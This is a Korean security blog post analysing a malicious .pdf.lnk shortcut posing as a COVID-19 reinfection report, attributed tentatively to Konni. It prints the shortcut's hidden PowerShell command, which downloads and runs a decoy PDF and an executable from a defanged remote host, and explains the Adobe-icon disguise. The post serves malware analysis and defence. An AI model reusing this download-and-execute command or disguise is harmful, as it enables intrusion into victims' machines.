오늘은 북한 해킹 단체 Konni(코니) 만든 것으로 추정되는 악성코드 국내코로나 19 재감염사례현황.pdf.lnk(2024.10.5)에 대해 글을 적어 보겠습니다. 여기서 어디까지는 Konni(코니) 인것 같다는 것이 공식이 아닙니다.
코로나 19 는 2019년 11월 중국 후베이성 우한시에서 처음으로 발생하여 보고된 새로운 유형의 변종 코로나바이러스인 SARS-CoV-2에 의해 발병한 급성 호흡기 전염병입니다. 아무튼, 현재는 블루 단계 관심을 두세요. 단계입니다.
일단 해당 악성코드 이름을 보면 국내코로나19재감염사례현황 인 것을 보면 의학 관련 종사자 분들이 타겟이 아닐까 생각이 됩니다. 어디까지나 私見 입니다.최근 코로나 19 가 유행을 한다고 해서 아마 유포가 되는즉 합니다.
먼저 해쉬값 입니다.
파일명:국내코로나19재감염사례현황.pdf.lnk
사이즈:127 MB
MD5:1f96ef9c871f24720c7c05055ad99c78
SHA-1:02cf6a1a8b6a06eaa92d3f0302a56507e0bd55b3
SHA-256:b9766b61ab05673e2945476d2cf5209345c06edbb4a90d6885de96ec03ff69b9
입니다. 이번에는 파일 크기가 100메가 이상 넘어가는 것을 확인할 수가 있습니다.
일단 02 01로 인생 복잡하게 더미 파일로 돼 있는 것을 확인할 수가 있습니다.
실행하는 코드는 다음과 같습니다.
StringData
{
namestring: not p(r)esent
relativepath: ..\..\..\..\Windows\SysWOW64\cmd(.)exe
workingdir: not present
commandlinearguments: /c powershell (-)windowstyle hidden -co(m)mand
"Set(-)Location -Path 'C:\Users\Public'; Invoke-WebR(e)quest -Uri \
'hxxp://172(.)22(.)224(.)1:7777/123.pdf' -OutFile 'C:\Users\Public
\국내코로나19재감염사례현황(.)pdf'; Invoke-WebRequest -Uri
'hxxp://172(.)22(.)224.1:7777/1(.)exe' -OutFile 'C:\Users\Public\1.exe'
; Start-Process -FilePath 'C:\Users\Public\국내코로나19재감염사례현황.pdf';
Start-Process -FilePath 'C:\Users\Public\1.exe'"
iconlocation: C:\Program Files\Adobe\Acrobat DC\Acrobat\CrashReporter
Resources\AdobeLogo(.)ico
}악성코드 분석
powershell -windowstyle hidden:PowerShell 명령을 실행할 때 창을 숨기는 명령어 사용자에게 명령이 실행 중임을 숨기기 위한 목적
Set-Location -Path 'C:\Users\Public':C:\Users\Public 디렉터리로 작업 경로를 설정하는 명령 해당 경로는 모든 사용자에게 접근 가능하여 악성 파일을 저장하는 데 자주 사용 곳입니다.
Invoke-WebRequest:PowerShell의 웹 요청 명령으로 원격 서버에서 파일을 다운로드하는 데 사용
첫 번째 파일:hxxp://172(.)22(.)224(.)1:7777/123(.)pdf에서 C:\Users\Public\국내코로나19재감염사례현황.pdf로 다운로드
두 번째 파일:hxxp://172(.)22(.)224(.)1:7777/1(.)exe에서 C:\Users\Public\1.exe로 다운로드
해당 1.exe 파일이 백도어 일 가능성이 크게 생각을 합니다. 서버가 터져서 자세한 것은 문석 못했습니다.
Start-Process -FilePath:다운로드된 파일들을 실행
첫 번째로 국내코로나19재감염사례현황.pdf 파일을 실행하여 디코이 파일을 보게 합니다. 해당 PDF는 악성 PDF가 아니더라도 신뢰감을 주려는 것일 수 있습니다.
두 번째로 1(.)exe를 실행<-이게 핵심
3.iconlocation: C:\Program Files\Adobe\Acrobat DC\Acrobat\CrashReporterResources\AdobeLogo.ico
해당 경로는 Adobe Acrobat 프로그램과 관련된 아이콘 파일을 나타 내며 해당 아이콘 파일을 지정함으로써 악성 파일이 Adobe와 관련된 것처럼 보이게 하려는 의도가 있을 수 있습니다. 즉 사용자의 의심을 피하기 위한 사회 공학적 기법
당연히 저같이 어도비 PDF 를 안 하는 사람들은 빈 파일 모양으로 표시될 것입니다.
AhnLab-V3:Trojan/LNK.Powershell.XSG12
AliCloud:Trojan:Multi/Powedon.c
ALYac:Trojan.PowerShell.LNK.Gen.14
Arcabit:Trojan.PowerShell.LNK.Gen.14 [many]
Avast:LNK:Agent-IL [Trj]
AVG:LNK:Agent-IL [Trj]
BitDefender:Trojan.PowerShell.LNK.Gen.14
CTX:Lnk.unknown.boxter
Emsisoft:Trojan.PowerShell.LNK.Gen.14 (B)
ESET-NOD32:A Variant Of Generik.BRHTYFC
Fortinet:LNK/Agent.D!tr
GData:Trojan.PowerShell.LNK.Gen.14
Google:Detected
Huorong:TrojanDownloader/LNK.Maloader.a
Kaspersky:HEUR:Trojan.Multi.Powedon.c
Lionic:Trojan.WinLNK.PowerShell.4!c
Rising:Downloader.PowerShell/LNK!1.E77F (CLASSIC)
SentinelOne (Static ML):Static AI - Suspicious LNK
Sophos:Mal/DownLnk-D
Symantec:Scr.Mallnk!gen13
Tencent:Win32.Trojan.Powedon.Hplw
Trellix (HX):Trojan.PowerShell.LNK.Gen.14
TrendMicro:HEUR_LNKEXEC.A
Varist:LNK/ABRisk.FBRA-8
VBA32:Trojan.Link.Crafted
VIPRE:Trojan.PowerShell.LNK.Gen.14
WithSecure:Trojan-Downloader:W32/Kataja.C
ZoneAlarm by Check Point:HEUR:Trojan.Multi.Powedon.c
Zoner:Probably Heur.LNKScript
즉 해당 부분은 의료 관련 종사자들을 목표로 하는 것을 추정되면 아무튼 기본적인 보안수칙을 잘 지키시길 바랍니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 김수키(Kimsuky) 코인 선물 트레이딩으로 위장 하고 있는 악성코드-코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk(2024.10.14) (0) | 2024.10.14 |
|---|---|
| 김수키(Kimsuky)에서 만든 연세대학교 웹메일 피싱 사이트-rfa(.)lol/yonsei(2024.10.8) (0) | 2024.10.11 |
| 윈도우 10,윈도우 11 KB5044273 KB5044284 보안 업데이트 (0) | 2024.10.10 |
| 모질라 파이어폭스 131.0.2 적극적으로 악용되는 취약점 수정 (0) | 2024.10.10 |
| 마이크로소프트 워드 에서는 일부 문서를 저장하는 대신 삭제 (2) | 2024.10.10 |
| 아이폰 터치 스크린 문제 및 성능 문제 해결한 iOS 18.0.1 업데이트 (0) | 2024.10.09 |
| 북한 김수키(Kimsuky)에서 만든 악성코드-20241003_20134.docx.lnk(2024.10.3) (0) | 2024.10.08 |
| 워드프레스(WordPress) The Events Calendar 플러그인 6.6.4.1 SQL Injection 취약점 (0) | 2024.10.07 |
